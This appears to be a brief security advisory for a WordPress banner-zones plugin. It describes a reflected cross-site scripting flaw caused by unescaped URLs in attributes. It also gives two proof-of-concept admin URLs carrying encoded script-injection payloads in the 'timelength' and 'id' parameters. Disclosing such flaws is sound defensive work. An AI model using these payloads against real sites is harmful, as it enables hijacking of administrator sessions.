Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
Have an admin open URLs:
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=Overview&id=1&timelength=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
- https://example.com/wp-admin/admin.php?page=bannerlid-zones&subpage=edit_zone&id=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E